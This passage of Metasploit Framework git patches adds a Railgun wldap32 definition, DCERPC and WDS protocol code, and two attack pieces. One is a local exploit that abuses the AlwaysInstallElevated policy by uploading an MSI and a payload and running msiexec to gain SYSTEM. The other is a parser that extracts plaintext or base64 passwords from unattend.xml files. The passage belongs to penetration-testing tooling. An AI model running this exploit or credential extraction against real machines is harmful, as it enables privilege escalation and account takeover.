From e057467329e98ff334820916e924d601af3371f8 Mon Sep 17 00:00:00 2001 From: Meatballs1 Date: Sun, 18 Nov 2012 21:24:49 +0000 Subject: [PATCH 001/421] Initial attempt --- .../stdapi/railgun/def/def_wldap32.rb | 34 + .../extensions/stdapi/railgun/railgun.rb | 597 +++++++++--------- 2 files changed, 333 insertions(+), 298 deletions(-) create mode 100644 lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wldap32.rb diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wldap32.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wldap32.rb new file mode 100644 index 000000000000..e13e618f5481 --- /dev/null +++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wldap32.rb @@ -0,0 +1,34 @@ +# -*- coding: binary -*- +module Rex +module Post +module Meterpreter +module Extensions +module Stdapi +module Railgun +module Def + +class Def_wldap32 + + def self.create_dll(dll_path = 'wldap32') + dll = DLL.new(dll_path, ApiConstants.manager) + + dll.add_function( 'ldap_sslinitW', 'PDWORD',[ + ['PCHAR', 'HostName', 'in'], + ['DWORD', 'PortNumber', 'in'], + ['DWORD', 'secure', 'in'] + ]) + + dll.add_function( 'ldap_simple_bind_sW', 'DWORD',[ + ['DWORD', 'ld', 'in'], + ['PCHAR', 'dn', 'in'], + ['PCHAR', 'passwd', 'in'] + ]) + + return dll + end + +end + +end; end; end; end; end; end; end + + diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb index 549cc8aa28e4..9c5dc4651c71 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb @@ -1,298 +1,299 @@ -# -*- coding: binary -*- -# Copyright (c) 2010, patrickHVE@googlemail.com -# All rights reserved. -# -# Redistribution and use in source and binary forms, with or without -# modification, are permitted provided that the following conditions are met: -# * Redistributions of source code must retain the above copyright -# notice, this list of conditions and the following disclaimer. -# * Redistributions in binary form must reproduce the above copyright -# notice, this list of conditions and the following disclaimer in the -# documentation and/or other materials provided with the distribution. -# * The names of the author may not be used to endorse or promote products -# derived from this software without specific prior written permission. -# -# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND -# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED -# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE -# DISCLAIMED. IN NO EVENT SHALL patrickHVE@googlemail.com BE LIABLE FOR ANY -# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES -# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; -# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND -# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT -# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS -# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - -# -# sf - Sept 2010 - Modified for x64 support and merged into the stdapi extension. -# - -# -# chao - June 2011 - major overhaul of dll lazy loading, caching, and bit of everything -# - -require 'pp' -require 'enumerator' - -require 'rex/post/meterpreter/extensions/stdapi/railgun/api_constants' -require 'rex/post/meterpreter/extensions/stdapi/railgun/tlv' -require 'rex/post/meterpreter/extensions/stdapi/railgun/util' -require 'rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager' -require 'rex/post/meterpreter/extensions/stdapi/railgun/multicall' -require 'rex/post/meterpreter/extensions/stdapi/railgun/dll' -require 'rex/post/meterpreter/extensions/stdapi/railgun/dll_wrapper' - -module Rex -module Post -module Meterpreter -module Extensions -module Stdapi -module Railgun - - -# -# The Railgun class to dynamically expose the Windows API. -# -class Railgun - - # - # Railgun::DLL's that have builtin definitions. - # - # If you want to add additional DLL definitions to be preloaded create a - # definition class 'rex/post/meterpreter/extensions/stdapi/railgun/def/'. - # Naming is important and should follow convention. For example, if your - # dll's name was "my_dll" - # file name: def_my_dll.rb - # class name: Def_my_dll - # entry below: 'my_dll' - # - BUILTIN_DLLS = [ - 'kernel32', - 'ntdll', - 'user32', - 'ws2_32', - 'iphlpapi', - 'advapi32', - 'shell32', - 'netapi32', - 'crypt32', - 'wlanapi', - ].freeze - - ## - # Returns a Hash containing DLLs added to this instance with #add_dll - # as well as references to any frozen cached dlls added directly in #get_dll - # and copies of any frozen dlls (added directly with #add_function) - # that the user attempted to modify with #add_function. - # - # Keys are friendly DLL names and values are the corresponding DLL instance - attr_accessor :dlls - - ## - # Contains a reference to the client that corresponds to this instance of railgun - attr_accessor :client - - ## - # These DLLs are loaded lazily and then shared amongst all railgun instances. - # For safety reasons this variable should only be read/written within #get_dll. - @@cached_dlls = {} - - # if you are going to touch @@cached_dlls, wear protection - @@cache_semaphore = Mutex.new - - def initialize(client) - self.client = client - self.dlls = {} - end - - def self.builtin_dlls - BUILTIN_DLLS - end - - # - # Return this Railgun's Util instance. - # - def util - if @util.nil? - @util = Util.new(self, client.platform) - end - - return @util - end - - # - # Return this Railgun's WinConstManager instance, initially populated with - # constants defined in ApiConstants. - # - def constant_manager - # Loads lazily - return ApiConstants.manager - end - - # - # Read data from a memory address on the host (useful for working with - # LPVOID parameters) - # - def memread(address, length) - - raise "Invalid parameters." if(not address or not length) - - request = Packet.create_request('stdapi_railgun_memread') - - request.add_tlv(TLV_TYPE_RAILGUN_MEM_ADDRESS, address) - request.add_tlv(TLV_TYPE_RAILGUN_MEM_LENGTH, length) - - response = client.send_request(request) - if(response.result == 0) - return response.get_tlv_value(TLV_TYPE_RAILGUN_MEM_DATA) - end - - return nil - end - - # - # Write data to a memory address on the host (useful for working with - # LPVOID parameters) - # - def memwrite(address, data, length) - - raise "Invalid parameters." if(not address or not data or not length) - - request = Packet.create_request('stdapi_railgun_memwrite') - - request.add_tlv(TLV_TYPE_RAILGUN_MEM_ADDRESS, address) - request.add_tlv(TLV_TYPE_RAILGUN_MEM_DATA, data) - request.add_tlv(TLV_TYPE_RAILGUN_MEM_LENGTH, length) - - response = client.send_request(request) - if(response.result == 0) - return true - end - - return false - end - - # - # Adds a function to an existing DLL definition. - # - # If the DLL definition is frozen (ideally this should be the case for all - # cached dlls) an unfrozen copy is created and used henceforth for this - # instance. - # - def add_function(dll_name, function_name, return_type, params, windows_name=nil) - - unless known_dll_names.include?(dll_name) - raise "DLL #{dll_name} not found. Known DLLs: #{PP.pp(known_dll_names, "")}" - end - - dll = get_dll(dll_name) - - # For backwards compatibility, we ensure the dll is thawed - if dll.frozen? - # Duplicate not only the dll, but its functions as well. Frozen status will be lost - dll = Marshal.load(Marshal.dump(dll)) - - # Update local dlls with the modifiable duplicate - dlls[dll_name] = dll - end - - dll.add_function(function_name, return_type, params, windows_name) - end - - # - # Adds a DLL to this Railgun. - # - # The +windows_name+ is the name used on the remote system and should be - # set appropriately if you want to include a path or the DLL name contains - # non-ruby-approved characters. - # - # Raises an exception if a dll with the given name has already been - # defined. - # - def add_dll(dll_name, windows_name=dll_name) - - if dlls.has_key? dll_name - raise "A DLL of name #{dll_name} has already been loaded." - end - - dlls[dll_name] = DLL.new(windows_name, constant_manager) - end - - - def known_dll_names - return BUILTIN_DLLS | dlls.keys - end - - # - # Attempts to provide a DLL instance of the given name. Handles lazy - # loading and caching. Note that if a DLL of the given name does not - # exist, returns nil - # - def get_dll(dll_name) - - # If the DLL is not local, we now either load it from cache or load it lazily. - # In either case, a reference to the dll is stored in the collection "dlls" - # If the DLL can not be found/created, no actions are taken - unless dlls.has_key? dll_name - # We read and write to @@cached_dlls and rely on state consistency - @@cache_semaphore.synchronize do - if @@cached_dlls.has_key? dll_name - dlls[dll_name] = @@cached_dlls[dll_name] - elsif BUILTIN_DLLS.include? dll_name - # I highly doubt this case will ever occur, but I am paranoid - if dll_name !~ /^\w+$/ - raise "DLL name #{dll_name} is bad. Correct Railgun::BUILTIN_DLLS" - end - - require 'rex/post/meterpreter/extensions/stdapi/railgun/def/def_' << dll_name - dll = Def.const_get('Def_' << dll_name).create_dll.freeze - - @@cached_dlls[dll_name] = dll - dlls[dll_name] = dll - end - end - - end - - return dlls[dll_name] - end - - # - # Fake having members like user32 and kernel32. - # reason is that - # ...user32.MessageBoxW() - # is prettier than - # ...dlls["user32"].functions["MessageBoxW"]() - # - def method_missing(dll_symbol, *args) - dll_name = dll_symbol.to_s - - unless known_dll_names.include? dll_name - raise "DLL #{dll_name} not found. Known DLLs: #{PP.pp(known_dll_names, '')}" - end - - dll = get_dll(dll_name) - - return DLLWrapper.new(dll, client) - end - - # - # Return a Windows constant matching +str+. - # - def const(str) - return constant_manager.parse(str) - end - - # - # The multi-call shorthand (["kernel32", "ExitProcess", [0]]) - # - def multi(functions) - if @multicaller.nil? - @multicaller = MultiCaller.new(client, self) - end - - return @multicaller.call(functions) - end -end - -end; end; end; end; end; end +# -*- coding: binary -*- +# Copyright (c) 2010, patrickHVE@googlemail.com +# All rights reserved. +# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions are met: +# * Redistributions of source code must retain the above copyright +# notice, this list of conditions and the following disclaimer. +# * Redistributions in binary form must reproduce the above copyright +# notice, this list of conditions and the following disclaimer in the +# documentation and/or other materials provided with the distribution. +# * The names of the author may not be used to endorse or promote products +# derived from this software without specific prior written permission. +# +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND +# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED +# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +# DISCLAIMED. IN NO EVENT SHALL patrickHVE@googlemail.com BE LIABLE FOR ANY +# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; +# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND +# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT +# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS +# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + +# +# sf - Sept 2010 - Modified for x64 support and merged into the stdapi extension. +# + +# +# chao - June 2011 - major overhaul of dll lazy loading, caching, and bit of everything +# + +require 'pp' +require 'enumerator' + +require 'rex/post/meterpreter/extensions/stdapi/railgun/api_constants' +require 'rex/post/meterpreter/extensions/stdapi/railgun/tlv' +require 'rex/post/meterpreter/extensions/stdapi/railgun/util' +require 'rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager' +require 'rex/post/meterpreter/extensions/stdapi/railgun/multicall' +require 'rex/post/meterpreter/extensions/stdapi/railgun/dll' +require 'rex/post/meterpreter/extensions/stdapi/railgun/dll_wrapper' + +module Rex +module Post +module Meterpreter +module Extensions +module Stdapi +module Railgun + + +# +# The Railgun class to dynamically expose the Windows API. +# +class Railgun + + # + # Railgun::DLL's that have builtin definitions. + # + # If you want to add additional DLL definitions to be preloaded create a + # definition class 'rex/post/meterpreter/extensions/stdapi/railgun/def/'. + # Naming is important and should follow convention. For example, if your + # dll's name was "my_dll" + # file name: def_my_dll.rb + # class name: Def_my_dll + # entry below: 'my_dll' + # + BUILTIN_DLLS = [ + 'kernel32', + 'ntdll', + 'user32', + 'ws2_32', + 'iphlpapi', + 'advapi32', + 'shell32', + 'netapi32', + 'crypt32', + 'wlanapi', + 'wldap32' + ].freeze + + ## + # Returns a Hash containing DLLs added to this instance with #add_dll + # as well as references to any frozen cached dlls added directly in #get_dll + # and copies of any frozen dlls (added directly with #add_function) + # that the user attempted to modify with #add_function. + # + # Keys are friendly DLL names and values are the corresponding DLL instance + attr_accessor :dlls + + ## + # Contains a reference to the client that corresponds to this instance of railgun + attr_accessor :client + + ## + # These DLLs are loaded lazily and then shared amongst all railgun instances. + # For safety reasons this variable should only be read/written within #get_dll. + @@cached_dlls = {} + + # if you are going to touch @@cached_dlls, wear protection + @@cache_semaphore = Mutex.new + + def initialize(client) + self.client = client + self.dlls = {} + end + + def self.builtin_dlls + BUILTIN_DLLS + end + + # + # Return this Railgun's Util instance. + # + def util + if @util.nil? + @util = Util.new(self, client.platform) + end + + return @util + end + + # + # Return this Railgun's WinConstManager instance, initially populated with + # constants defined in ApiConstants. + # + def constant_manager + # Loads lazily + return ApiConstants.manager + end + + # + # Read data from a memory address on the host (useful for working with + # LPVOID parameters) + # + def memread(address, length) + + raise "Invalid parameters." if(not address or not length) + + request = Packet.create_request('stdapi_railgun_memread') + + request.add_tlv(TLV_TYPE_RAILGUN_MEM_ADDRESS, address) + request.add_tlv(TLV_TYPE_RAILGUN_MEM_LENGTH, length) + + response = client.send_request(request) + if(response.result == 0) + return response.get_tlv_value(TLV_TYPE_RAILGUN_MEM_DATA) + end + + return nil + end + + # + # Write data to a memory address on the host (useful for working with + # LPVOID parameters) + # + def memwrite(address, data, length) + + raise "Invalid parameters." if(not address or not data or not length) + + request = Packet.create_request('stdapi_railgun_memwrite') + + request.add_tlv(TLV_TYPE_RAILGUN_MEM_ADDRESS, address) + request.add_tlv(TLV_TYPE_RAILGUN_MEM_DATA, data) + request.add_tlv(TLV_TYPE_RAILGUN_MEM_LENGTH, length) + + response = client.send_request(request) + if(response.result == 0) + return true + end + + return false + end + + # + # Adds a function to an existing DLL definition. + # + # If the DLL definition is frozen (ideally this should be the case for all + # cached dlls) an unfrozen copy is created and used henceforth for this + # instance. + # + def add_function(dll_name, function_name, return_type, params, windows_name=nil) + + unless known_dll_names.include?(dll_name) + raise "DLL #{dll_name} not found. Known DLLs: #{PP.pp(known_dll_names, "")}" + end + + dll = get_dll(dll_name) + + # For backwards compatibility, we ensure the dll is thawed + if dll.frozen? + # Duplicate not only the dll, but its functions as well. Frozen status will be lost + dll = Marshal.load(Marshal.dump(dll)) + + # Update local dlls with the modifiable duplicate + dlls[dll_name] = dll + end + + dll.add_function(function_name, return_type, params, windows_name) + end + + # + # Adds a DLL to this Railgun. + # + # The +windows_name+ is the name used on the remote system and should be + # set appropriately if you want to include a path or the DLL name contains + # non-ruby-approved characters. + # + # Raises an exception if a dll with the given name has already been + # defined. + # + def add_dll(dll_name, windows_name=dll_name) + + if dlls.has_key? dll_name + raise "A DLL of name #{dll_name} has already been loaded." + end + + dlls[dll_name] = DLL.new(windows_name, constant_manager) + end + + + def known_dll_names + return BUILTIN_DLLS | dlls.keys + end + + # + # Attempts to provide a DLL instance of the given name. Handles lazy + # loading and caching. Note that if a DLL of the given name does not + # exist, returns nil + # + def get_dll(dll_name) + + # If the DLL is not local, we now either load it from cache or load it lazily. + # In either case, a reference to the dll is stored in the collection "dlls" + # If the DLL can not be found/created, no actions are taken + unless dlls.has_key? dll_name + # We read and write to @@cached_dlls and rely on state consistency + @@cache_semaphore.synchronize do + if @@cached_dlls.has_key? dll_name + dlls[dll_name] = @@cached_dlls[dll_name] + elsif BUILTIN_DLLS.include? dll_name + # I highly doubt this case will ever occur, but I am paranoid + if dll_name !~ /^\w+$/ + raise "DLL name #{dll_name} is bad. Correct Railgun::BUILTIN_DLLS" + end + + require 'rex/post/meterpreter/extensions/stdapi/railgun/def/def_' << dll_name + dll = Def.const_get('Def_' << dll_name).create_dll.freeze + + @@cached_dlls[dll_name] = dll + dlls[dll_name] = dll + end + end + + end + + return dlls[dll_name] + end + + # + # Fake having members like user32 and kernel32. + # reason is that + # ...user32.MessageBoxW() + # is prettier than + # ...dlls["user32"].functions["MessageBoxW"]() + # + def method_missing(dll_symbol, *args) + dll_name = dll_symbol.to_s + + unless known_dll_names.include? dll_name + raise "DLL #{dll_name} not found. Known DLLs: #{PP.pp(known_dll_names, '')}" + end + + dll = get_dll(dll_name) + + return DLLWrapper.new(dll, client) + end + + # + # Return a Windows constant matching +str+. + # + def const(str) + return constant_manager.parse(str) + end + + # + # The multi-call shorthand (["kernel32", "ExitProcess", [0]]) + # + def multi(functions) + if @multicaller.nil? + @multicaller = MultiCaller.new(client, self) + end + + return @multicaller.call(functions) + end +end + +end; end; end; end; end; end From d9117224912d76ca0b0991694eea83b2ac192811 Mon Sep 17 00:00:00 2001 From: Meatballs1 Date: Wed, 28 Nov 2012 16:36:57 +0000 Subject: [PATCH 002/421] Add initial auto run script --- .../windows/local/always_install_elevated.rb | 174 ++++++++++++++++++ 1 file changed, 174 insertions(+) create mode 100644 modules/exploits/windows/local/always_install_elevated.rb diff --git a/modules/exploits/windows/local/always_install_elevated.rb b/modules/exploits/windows/local/always_install_elevated.rb new file mode 100644 index 000000000000..9569bb6f2ea9 --- /dev/null +++ b/modules/exploits/windows/local/always_install_elevated.rb @@ -0,0 +1,174 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex' +require 'msf/core/post/windows/registry' +require 'msf/core/post/common' +require 'msf/core/post/file' + +class Metasploit3 < Msf::Exploit::Local + Rank = AverageRanking + + include Msf::Exploit::EXE + include Msf::Post::Common + include Msf::Post::File + include Msf::Post::Windows::Registry + + def initialize(info={}) + super(update_info(info, { + 'Name' => 'Windows AlwaysInstallElevated MSI', + 'Description' => %q{ + This module checks the AlwaysInstallElevated registry keys which + dictate if .MSI files should be installed with elevated privileges + (NT AUTHORITY\SYSTEM). + + The default MSI file is data/exploits/exec_payload.msi with the WiX source + file under external/source/exploits/exec_payload_msi/exec_payload.wxs. + This MSI simply executes payload.exe within the same folder. + + The MSI may not execute succesfully successive times, but may be able to + get around this by regenerating the MSI. + + MSI can be rebuilt from the source using the WIX tool with the following commands: + candle exec_payload.wxs + light exec_payload.wixobj + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Ben Campbell', + 'Parvez Anwar' # discovery?/inspiration + ], + 'Arch' => [ ARCH_X86, ARCH_X86_64 ], + 'Platform' => [ 'win' ], + 'SessionTypes' => [ 'meterpreter' ], + 'DefaultOptions' => + { + 'WfsDelay' => 10, + 'EXITFUNC' => 'thread', + 'InitialAutoRunScript' => 'migrate -k -f' + }, + 'Targets' => + [ + [ 'Windows', { } ], + ], + 'References' => + [ + [ 'URL', 'http://www.greyhathacker.net/?p=185' ], + [ 'URL', 'http://msdn.microsoft.com/en-us/library/aa367561(VS.85).aspx' ], + [ 'URL', 'http://wix.sourceforge.net'] , + ], + 'DisclosureDate'=> 'Mar 18 2010', + 'DefaultTarget' => 0 + })) + + register_advanced_options([ + OptString.new('LOG_FILE', [false, 'Remote path to output MSI log file to.', nil]), + OptBool.new('QUIET', [true, 'Run the MSI with the /quiet flag.', true]) + ], self.class) + end + + def check + install_elevated = "AlwaysInstallElevated" + installer = "SOFTWARE\\Policies\\Microsoft\\Windows\\Installer" + hkcu = "HKEY_CURRENT_USER\\#{installer}" + hklm = "HKEY_LOCAL_MACHINE\\#{installer}" + + local_machine_value = registry_getvaldata(hklm,install_elevated) + + if local_machine_value.nil? + print_error("#{hklm}\\#{install_elevated} does not exist or is not accessible.") + return Msf::Exploit::CheckCode::Safe + elsif local_machine_value == 0 + print_error("#{hklm}\\#{install_elevated} is #{local_machine_value}.") + return Msf::Exploit::CheckCode::Safe + else + print_good("#{hklm}\\#{install_elevated} is #{local_machine_value}.") + current_user_value = registry_getvaldata(hkcu,install_elevated) + + if current_user_value.nil? + print_error("#{hkcu}\\#{install_elevated} does not exist or is not accessible.") + return Msf::Exploit::CheckCode::Safe + elsif current_user_value == 0 + print_error("#{hkcu}\\#{install_elevated} is #{current_user_value}.") + return Msf::Exploit::CheckCode::Safe + else + print_good("#{hkcu}\\#{install_elevated} is #{current_user_value}.") + return Msf::Exploit::CheckCode::Vulnerable + end + end + end + + def cleanup + if @executed + begin + print_status("Deleting MSI...") + file_rm(@msi_destination) + rescue Rex::Post::Meterpreter::RequestError => e + print_error(e.to_s) + print_error("Failed to delete MSI #{@msi_destination}, manual cleanup may be required.") + end + + begin + print_status("Deleting Payload...") + file_rm(@payload_destination) + rescue Rex::Post::Meterpreter::RequestError => e + print_error(e.to_s) + print_error("Failed to delete payload #{@payload_destination}, this is expected if the exploit is successful, manual cleanup may be required.") + end + end + end + + def exploit + @executed = false + if check == Msf::Exploit::CheckCode::Vulnerable + @executed = true + + msi_filename = "exec_payload.msi" # Rex::Text.rand_text_alpha((rand(8)+6)) + ".msi" + msi_source = ::File.join(Msf::Config.install_root, "data", "exploits", "exec_payload.msi") + + # Upload MSI + @msi_destination = expand_path("%TEMP%\\#{msi_filename}").strip # expand_path in Windows Shell adds a newline and has to be stripped + print_status("Uploading the MSI to #{@msi_destination} ...") + + #upload_file - ::File.read doesn't appear to work in windows... + source = File.open(msi_source, "rb"){|fd| fd.read(fd.stat.size) } + write_file(@msi_destination, source) + + # Upload payload + payload = generate_payload_exe + @payload_destination = expand_path("%TEMP%\\payload.exe").strip + print_status("Uploading the Payload to #{@payload_destination} ...") + write_file(@payload_destination, payload) + + # Execute MSI + print_status("Executing MSI...") + + if datastore['LOG_FILE'].nil? + logging = "" + else + logging = "/l* #{datastore['LOG_FILE']} " + end + + if datastore['QUIET'] + quiet = "/quiet " + else + quiet = "" + end + + cmd = "msiexec.exe #{logging}#{quiet}/package #{@msi_destination}" + vprint_status("Executing: #{cmd}") + begin + result = cmd_exec(cmd) + rescue Rex::TimeoutError + vprint_status("Execution timed out.") + end + vprint_status("MSI command-line feedback: #{result}") + end + end +end From e60d10bd3d3303e8122116f7d2c22fc13bfa4c68 Mon Sep 17 00:00:00 2001 From: Meatballs1 Date: Thu, 13 Dec 2012 09:40:36 +0000 Subject: [PATCH 003/421] Repackage as single module pull --- lib/rex/parser/unattend.rb | 128 ++++++++++ lib/rex/proto/dcerpc/client.rb | 9 +- lib/rex/proto/dcerpc/packet.rb | 10 +- lib/rex/proto/dcerpc/wdscp.rb | 3 + lib/rex/proto/dcerpc/wdscp/constants.rb | 89 +++++++ lib/rex/proto/dcerpc/wdscp/packet.rb | 74 ++++++ .../dcerpc/windows_deployment_services.rb | 221 ++++++++++++++++++ 7 files changed, 530 insertions(+), 4 deletions(-) create mode 100644 lib/rex/parser/unattend.rb create mode 100644 lib/rex/proto/dcerpc/wdscp.rb create mode 100644 lib/rex/proto/dcerpc/wdscp/constants.rb create mode 100644 lib/rex/proto/dcerpc/wdscp/packet.rb create mode 100644 modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb diff --git a/lib/rex/parser/unattend.rb b/lib/rex/parser/unattend.rb new file mode 100644 index 000000000000..f760410c3fdf --- /dev/null +++ b/lib/rex/parser/unattend.rb @@ -0,0 +1,128 @@ +# -*- coding: binary -*- +# + +module Rex +module Parser +class Unattend + + def self.parse(xml) + results = [] + unattend = xml.elements['unattend'] + return if unattend.nil? + unattend.each_element do |settings| + next if settings.class != REXML::Element + settings.get_elements('component').each do |c| + next if c.class != REXML::Element + results << extract_useraccounts(c.elements['UserAccounts']) + results << extract_autologon(c.elements['AutoLogon']) + results << extract_deployment(c.elements['WindowsDeploymentServices']) + end + end + return results.flatten + end + + # + # Extract sensitive data from Deployment Services. + # We can only seem to add one with Windows System Image Manager, so + # we'll only enum one. + # + def self.extract_deployment(deployment) + return [] if deployment.nil? + domain = deployment.elements['Login/Credentials/Domain'].get_text.value rescue '' + username = deployment.elements['Login/Credentials/Username'].get_text.value rescue '' + password = deployment.elements['Login/Credentials/Password'].get_text.value rescue '' + plaintext = deployment.elements['Login/Credentials/Password/PlainText'].get_text.value rescue 'true' + + if plaintext == 'false' + password = Rex::Text.decode_base64(password) + password = password.gsub(/#{Rex::Text.to_unicode('Password')}$/, '') + end + + return {'type' => 'wds', 'domain' => domain, 'username' => username, 'password' => password } + end + + # + # Extract sensitive data from AutoLogon + # + def self.extract_autologon(auto_logon) + return [] if auto_logon.nil? + + domain = auto_logon.elements['Domain'].get_text.value rescue '' + username = auto_logon.elements['Username'].get_text.value rescue '' + password = auto_logon.elements['Password/Value'].get_text.value rescue '' + plaintext = auto_logon.elements['Password/PlainText'].get_text.value rescue 'true' + + if plaintext == 'false' + password = Rex::Text.decode_base64(password) + password = password.gsub(/#{Rex::Text.to_unicode('Password')}$/, '') + end + + return {'type' => 'auto', 'domain' => domain, 'username' => username, 'password' => password } + end + + # + # Extract sensitive data from UserAccounts + # + def self.extract_useraccounts(user_accounts) + return[] if user_accounts.nil? + + results = [] + account_types = ['AdministratorPassword', 'DomainAccounts', 'LocalAccounts'] + account_types.each do |t| + element = user_accounts.elements[t] + next if element.nil? + + case t + # + # Extract the password from AdministratorPasswords + # + when account_types[0] + password = element.elements['Value'].get_text.value rescue '' + plaintext = element.elements['PlainText'].get_text.value rescue 'true' + + if plaintext == 'false' + password = Rex::Text.decode_base64(password) + password = password.gsub(/#{Rex::Text.to_unicode('AdministratorPassword')}$/, '') + end + + if not password.empty? + results << {'type' => 'admin', 'username' => 'Administrator', 'password' => password} + end + + # + # Extract the sensitive data from DomainAccounts. + # According to MSDN, unattend.xml doesn't seem to store passwords for domain accounts + # + when account_types[1] #DomainAccounts + element.elements.each do |account_list| + name = account_list.elements['DomainAccount/Name'].get_text.value rescue '' + group = account_list.elements['DomainAccount/Group'].get_text.value rescue 'true' + + results << {'type' => 'domain', 'username' => name, 'group' => group} + end + # + # Extract the username/password from LocalAccounts + # + when account_types[2] #LocalAccounts + element.elements.each do |local| + password = local.elements['Password/Value'].get_text.value rescue '' + plaintext = local.elements['Password/PlainText'].get_text.value rescue 'true' + + if plaintext == 'false' + password = Rex::Text.decode_base64(password) + password = password.gsub(/#{Rex::Text.to_unicode('Password')}$/, '') + end + + username = local.elements['Name'].get_text.value rescue '' + results << {'type' => 'local', 'username' => username, 'password' => password} + end + end + end + + return results + end + +end +end +end + diff --git a/lib/rex/proto/dcerpc/client.rb b/lib/rex/proto/dcerpc/client.rb index 928e5eb4bfc2..c4aaaa6f3acb 100644 --- a/lib/rex/proto/dcerpc/client.rb +++ b/lib/rex/proto/dcerpc/client.rb @@ -252,7 +252,14 @@ def bind() bind, context = Rex::Proto::DCERPC::Packet.make_bind_fake_multi(*args) else - bind, context = Rex::Proto::DCERPC::Packet.make_bind(self.handle.uuid[0], self.handle.uuid[1]) + if self.handle.uuid.length == 4 + bind, context = Rex::Proto::DCERPC::Packet.make_bind( self.handle.uuid[0], + self.handle.uuid[1], + self.handle.uuid[2], + self.handle.uuid[3]) + else + bind, context = Rex::Proto::DCERPC::Packet.make_bind(self.handle.uuid[0], self.handle.uuid[1]) + end end raise 'make_bind failed' if !bind diff --git a/lib/rex/proto/dcerpc/packet.rb b/lib/rex/proto/dcerpc/packet.rb index 463a8a8be755..34aa73de14c0 100644 --- a/lib/rex/proto/dcerpc/packet.rb +++ b/lib/rex/proto/dcerpc/packet.rb @@ -11,11 +11,15 @@ class Packet UUID = Rex::Proto::DCERPC::UUID # Create a standard DCERPC BIND request packet - def self.make_bind(uuid, vers) + def self.make_bind(uuid, vers, xfer_syntax_uuid=UUID.xfer_syntax_uuid, xfer_syntax_vers=UUID.xfer_syntax_vers) # Process the version strings ("1.0", 1.0, "1", 1) bind_vers_maj, bind_vers_min = UUID.vers_to_nums(vers) - xfer_vers_maj, xfer_vers_min = UUID.vers_to_nums(UUID.xfer_syntax_vers) + xfer_vers_maj, xfer_vers_min = UUID.vers_to_nums(xfer_syntax_vers) + + if UUID.is? xfer_syntax_uuid + xfer_syntax_uuid = UUID.uuid_pack(xfer_syntax_uuid) + end # Create the bind request packet buff = @@ -37,7 +41,7 @@ def self.make_bind(uuid, vers) UUID.uuid_pack(uuid), # interface uuid bind_vers_maj, # interface major version bind_vers_min, # interface minor version - UUID.xfer_syntax_uuid, # transfer syntax + xfer_syntax_uuid, # transfer syntax xfer_vers_maj, # syntax major version xfer_vers_min, # syntax minor version ].pack('CCCCNvvVvvVVvvA16vvA16vv') diff --git a/lib/rex/proto/dcerpc/wdscp.rb b/lib/rex/proto/dcerpc/wdscp.rb new file mode 100644 index 000000000000..519f2ffb9071 --- /dev/null +++ b/lib/rex/proto/dcerpc/wdscp.rb @@ -0,0 +1,3 @@ +# -*- coding: binary -*- +require 'rex/proto/dcerpc/wdscp/constants' +require 'rex/proto/dcerpc/wdscp/packet' diff --git a/lib/rex/proto/dcerpc/wdscp/constants.rb b/lib/rex/proto/dcerpc/wdscp/constants.rb new file mode 100644 index 000000000000..1df1625a4ff2 --- /dev/null +++ b/lib/rex/proto/dcerpc/wdscp/constants.rb @@ -0,0 +1,89 @@ +# -*- coding: binary -*- +module Rex +module Proto +module DCERPC +module WDSCP +# http://msdn.microsoft.com/en-us/library/dd891406(prot.20).aspx +# http://msdn.microsoft.com/en-us/library/dd541332(prot.20).aspx +# Not all values defined by the spec have been imported... +class Constants + WDSCP_RPC_UUID = "1A927394-352E-4553-AE3F-7CF4AAFCA620" + OS_DEPLOYMENT_GUID = "\x5a\xeb\xde\xd8\xfd\xef\xb2\x43\x99\xfc\x1a\x8a\x59\x21\xc2\x27" + + VAR_NAME_ARCHITECTURE = "ARCHITECTURE" + VAR_NAME_CLIENT_GUID = "CLIENT_GUID" + VAR_NAME_CLIENT_MAC = "CLIENT_MAC" + VAR_NAME_VERSION = "VERSION" + 